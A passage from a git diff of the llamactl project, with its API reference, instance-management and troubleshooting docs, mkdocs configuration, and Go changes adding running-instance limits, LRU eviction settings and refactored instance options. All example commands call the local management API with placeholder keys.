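Starting is asynchronous: the response above reports `starting`, so clients generally poll the instance endpoint until it reports `running`. Below is a minimal Go sketch of such a poll loop. It is a hypothetical client helper (the endpoint, response fields, and the `running` status string come from this reference; the host, API key, timeout, and interval are placeholders), not code shipped with llamactl.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"time"
)

// instanceState mirrors the fields shown in the responses above.
type instanceState struct {
	Name    string `json:"name"`
	Status  string `json:"status"`
	Created int64  `json:"created"`
}

// waitUntilRunning polls GET /api/v1/instances/{name} until the status is "running".
func waitUntilRunning(name, apiKey string) error {
	url := "http://localhost:8080/api/v1/instances/" + name
	for attempt := 0; attempt < 30; attempt++ {
		req, err := http.NewRequest("GET", url, nil)
		if err != nil {
			return err
		}
		req.Header.Set("Authorization", "Bearer "+apiKey)

		resp, err := http.DefaultClient.Do(req)
		if err != nil {
			return err
		}
		var state instanceState
		err = json.NewDecoder(resp.Body).Decode(&state)
		resp.Body.Close()
		if err != nil {
			return err
		}
		if state.Status == "running" {
			return nil
		}
		time.Sleep(2 * time.Second) // still starting; try again shortly
	}
	return fmt.Errorf("instance %s did not reach running state in time", name)
}

func main() {
	if err := waitUntilRunning("llama2-7b", "your-api-key"); err != nil {
		fmt.Println(err)
	}
}
```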
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopping",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "restarting",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing model name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
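As a concrete illustration of how a client might call these endpoints and handle the error codes above, here is a small Go sketch. It is hypothetical client code (the instance name, API key, and host are placeholders), not something provided by llamactl.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
)

func main() {
	// Standard OpenAI-style body; the "model" field names the llamactl instance.
	body, _ := json.Marshal(map[string]any{
		"model": "llama2-7b",
		"messages": []map[string]string{
			{"role": "user", "content": "Hello, how are you?"},
		},
	})

	req, _ := http.NewRequest("POST", "http://localhost:8080/v1/chat/completions", bytes.NewReader(body))
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer your-inference-api-key")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		fmt.Println("request failed:", err)
		return
	}
	defer resp.Body.Close()

	switch resp.StatusCode {
	case http.StatusOK:
		out, _ := io.ReadAll(resp.Body)
		fmt.Println(string(out))
	case http.StatusServiceUnavailable:
		fmt.Println("instance is not running and on-demand start is disabled")
	case http.StatusConflict:
		fmt.Println("cannot start instance: maximum running instances reached")
	default:
		fmt.Println("unexpected status:", resp.Status)
	}
}
```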
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"model": "/models/llama-2-7b.gguf"
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.


@@ -0,0 +1,190 @@
# Managing Instances
Learn how to effectively manage your Llama.cpp instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. Configure model source (choose one):
- **Model Path**: Full path to your downloaded GGUF model file
- **HuggingFace Repo**: Repository name (e.g., `unsloth/gemma-3-27b-it-GGUF`)
- **HuggingFace File**: Specific file within the repo (optional, uses default if not specified)
4. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
5. Configure optional llama-server backend options:
- **Threads**: Number of CPU threads to use
- **Context Size**: Context window size (ctx_size)
- **GPU Layers**: Number of layers to offload to GPU
- **Port**: Network port (auto-assigned by llamactl if not specified)
- **Additional Parameters**: Any other llama-server command line options (see [llama-server documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/server/README.md))
6. Click **"Create"** to save the instance
### Via API
```bash
# Create instance with local model file
curl -X POST http://localhost:8080/api/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096
}
}'
# Create instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
},
"auto_restart": true,
"max_restarts": 3
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Retrieve the instance logs:
```bash
# Get instance logs
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying llama-server instances.
```bash
# Send a request to the llama-server instance through the proxy
curl http://localhost:8080/api/instances/{name}/proxy/
```
Check llama-server [docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md) for more information.
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```


@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

68
mkdocs.yml Normal file

@@ -0,0 +1,68 @@
site_name: Llamatl Documentation
site_description: User documentation for Llamatl - A management tool for Llama.cpp instances
site_author: Llamatl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

7
pkg/backends/backend.go Normal file

@@ -0,0 +1,7 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
)


@@ -55,6 +55,12 @@ type InstancesConfig struct {
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
@@ -113,6 +119,8 @@ func LoadConfig(configPath string) (AppConfig, error) {
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
@@ -211,6 +219,16 @@ func loadEnvVars(cfg *AppConfig) {
cfg.Instances.MaxInstances = m
}
}
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
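The config fields above only make the limits configurable; per the commit history, the eviction policy itself lives in timeout.go and uses a per-instance LastRequestTime to stop the least recently used running instance when max_running_instances would otherwise be exceeded. The following is a self-contained Go sketch of that selection idea, using hypothetical stand-in types rather than the project's actual Process and manager code.

```go
package main

import (
	"fmt"
	"time"
)

// instance is a stand-in for the project's Process type; the real code tracks
// a last-request timestamp per instance (see the LastRequestTime commit above).
type instance struct {
	name        string
	lastRequest time.Time
}

// evictLRU picks the running instance that has been idle the longest.
// This mirrors the idea behind enable_lru_eviction, not the actual implementation.
func evictLRU(running []*instance) *instance {
	var lru *instance
	for _, inst := range running {
		if lru == nil || inst.lastRequest.Before(lru.lastRequest) {
			lru = inst
		}
	}
	return lru
}

func main() {
	now := time.Now()
	running := []*instance{
		{name: "llama2-7b", lastRequest: now.Add(-30 * time.Minute)},
		{name: "gemma-3-27b", lastRequest: now.Add(-2 * time.Minute)},
	}
	// With max_running_instances reached, the manager would stop this instance
	// before starting the next on-demand instance.
	fmt.Println("evict:", evictLRU(running).name)
}
```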


@@ -5,7 +5,7 @@ import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"io" "io"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends"
"llamactl/pkg/config" "llamactl/pkg/config"
"log" "log"
"net/http" "net/http"
@@ -29,52 +29,6 @@ func (realTimeProvider) Now() time.Time {
return time.Now()
}
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"`
// LlamaServerOptions contains the options for the llama server
llamacpp.LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
OnDemandStart *bool `json:"on_demand_start,omitempty"`
IdleTimeout *int `json:"idle_timeout,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
c.OnDemandStart = temp.OnDemandStart
c.IdleTimeout = temp.IdleTimeout
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
@@ -82,7 +36,8 @@ type Process struct {
globalSettings *config.InstancesConfig
// Status
Running bool `json:"running"`
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
@@ -109,105 +64,23 @@ type Process struct {
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
if options.OnDemandStart != nil {
onDemandStart := *options.OnDemandStart
optionsCopy.OnDemandStart = &onDemandStart
}
if options.IdleTimeout != nil {
idleTimeout := *options.IdleTimeout
if idleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, idleTimeout)
idleTimeout = 0
}
optionsCopy.IdleTimeout = &idleTimeout
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
if options.OnDemandStart == nil {
defaultOnDemandStart := globalSettings.DefaultOnDemandStart
options.OnDemandStart = &defaultOnDemandStart
}
if options.IdleTimeout == nil {
defaultIdleTimeout := 0
options.IdleTimeout = &defaultIdleTimeout
}
}
// NewInstance creates a new instance with the given name, log path, and options
-func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
+func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
	// Validate and copy options
-	optionsCopy := validateAndCopyOptions(name, options)
-	// Apply defaults
-	applyDefaultOptions(optionsCopy, globalSettings)
+	options.ValidateAndApplyDefaults(name, globalSettings)

	// Create the instance logger
	logger := NewInstanceLogger(name, globalSettings.LogsDir)

	return &Process{
		Name:           name,
-		options:        optionsCopy,
+		options:        options,
		globalSettings: globalSettings,
		logger:         logger,
		timeProvider:   realTimeProvider{},
		Created:        time.Now().Unix(),
+		Status:         Stopped,
+		onStatusChange: onStatusChange,
	}
}
@@ -217,6 +90,30 @@ func (i *Process) GetOptions() *CreateInstanceOptions {
return i.options return i.options
} }
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Port
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Host
}
}
return ""
}
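The new GetPort/GetHost accessors above read backend-specific values under a read lock and dispatch on the backend type. A minimal stand-alone sketch of the same pattern (local stand-in types; the "llama_cpp" constant value is assumed from the test fixtures below, not taken from the backends package itself):

```go
package main

import (
	"fmt"
	"sync"
)

type BackendType string

const BackendTypeLlamaCpp BackendType = "llama_cpp" // assumed value

type llamaOptions struct {
	Host string
	Port int
}

type options struct {
	BackendType BackendType
	LlamaCpp    *llamaOptions
}

type process struct {
	mu   sync.RWMutex
	opts *options
}

// GetPort reads the backend-specific port under a read lock,
// returning 0 when no options or no matching backend are set.
func (p *process) GetPort() int {
	p.mu.RLock()
	defer p.mu.RUnlock()
	if p.opts != nil {
		switch p.opts.BackendType {
		case BackendTypeLlamaCpp:
			if p.opts.LlamaCpp != nil {
				return p.opts.LlamaCpp.Port
			}
		}
	}
	return 0
}

func main() {
	p := &process{opts: &options{
		BackendType: BackendTypeLlamaCpp,
		LlamaCpp:    &llamaOptions{Host: "localhost", Port: 8080},
	}}
	fmt.Println(p.GetPort()) // 8080
}
```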
func (i *Process) SetOptions(options *CreateInstanceOptions) {
	i.mu.Lock()
	defer i.mu.Unlock()
@@ -226,11 +123,10 @@ func (i *Process) SetOptions(options *CreateInstanceOptions) {
		return
	}

-	// Validate and copy options and apply defaults
-	optionsCopy := validateAndCopyOptions(i.Name, options)
-	applyDefaultOptions(optionsCopy, i.globalSettings)
+	// Validate and copy options
+	options.ValidateAndApplyDefaults(i.Name, i.globalSettings)

-	i.options = optionsCopy
+	i.options = options

	// Clear the proxy so it gets recreated with new options
	i.proxy = nil
}
@@ -253,7 +149,15 @@ func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
		return nil, fmt.Errorf("instance %s has no options set", i.Name)
	}

-	targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port))
+	var host string
+	var port int
+	switch i.options.BackendType {
+	case backends.BackendTypeLlamaCpp:
+		host = i.options.LlamaServerOptions.Host
+		port = i.options.LlamaServerOptions.Port
+	}
+
+	targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
	if err != nil {
		return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
	}
@@ -283,44 +187,36 @@ func (i *Process) MarshalJSON() ([]byte, error) {
i.mu.RLock() i.mu.RLock()
defer i.mu.RUnlock() defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling // Use anonymous struct to avoid recursion
temp := struct { type Alias Process
Name string `json:"name"` return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"` Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{ }{
Name: i.Name, Alias: (*Alias)(i),
Options: i.options, Options: i.options,
Running: i.Running, })
Created: i.Created,
}
return json.Marshal(temp)
} }
// UnmarshalJSON implements json.Unmarshaler for Instance // UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error { func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling // Use anonymous struct to avoid recursion
temp := struct { type Alias Process
Name string `json:"name"` aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"` Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"` }{
Created int64 `json:"created,omitempty"` Alias: (*Alias)(i),
}{} }
if err := json.Unmarshal(data, &temp); err != nil { if err := json.Unmarshal(data, aux); err != nil {
return err return err
} }
// Set the fields // Handle options with validation and defaults
i.Name = temp.Name if aux.Options != nil {
i.Running = temp.Running aux.Options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.Created = temp.Created i.options = aux.Options
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
} }
return nil return nil
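The `type Alias Process` device used in the MarshalJSON/UnmarshalJSON above is the usual way to keep the default encoder for most fields while layering on custom handling, without recursing back into the custom methods. A minimal, self-contained sketch of the pattern (stand-in types, not the commit's code):

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Process is a stand-in for the real struct; the pattern is what matters.
type Process struct {
	Name    string `json:"name"`
	Created int64  `json:"created,omitempty"`
	options map[string]any
}

// MarshalJSON exposes the unexported options field without recursion:
// Alias shares Process's fields but none of its methods, so the inner
// json.Marshal uses the default encoder instead of calling MarshalJSON again.
func (p *Process) MarshalJSON() ([]byte, error) {
	type Alias Process
	return json.Marshal(&struct {
		*Alias
		Options map[string]any `json:"options,omitempty"`
	}{
		Alias:   (*Alias)(p),
		Options: p.options,
	})
}

func (p *Process) UnmarshalJSON(data []byte) error {
	type Alias Process
	aux := &struct {
		*Alias
		Options map[string]any `json:"options,omitempty"`
	}{Alias: (*Alias)(p)}
	if err := json.Unmarshal(data, aux); err != nil {
		return err
	}
	p.options = aux.Options
	return nil
}

func main() {
	p := &Process{Name: "demo", Created: 1700000000, options: map[string]any{"port": 8080}}
	out, _ := json.Marshal(p)
	fmt.Println(string(out)) // {"name":"demo","created":1700000000,"options":{"port":8080}}

	var back Process
	_ = json.Unmarshal(out, &back)
	fmt.Println(back.Name, back.options["port"]) // demo 8080
}
```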


@@ -2,6 +2,7 @@ package instance_test
import ( import (
"encoding/json" "encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -18,28 +19,32 @@ func TestNewInstance(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
if instance.Name != "test-instance" { inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
} }
if instance.Running { if inst.IsRunning() {
t.Error("New instance should not be running") t.Error("New instance should not be running")
} }
// Check that options were properly set with defaults applied // Check that options were properly set with defaults applied
opts := instance.GetOptions() opts := inst.GetOptions()
if opts.Model != "/path/to/model.gguf" { if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
} }
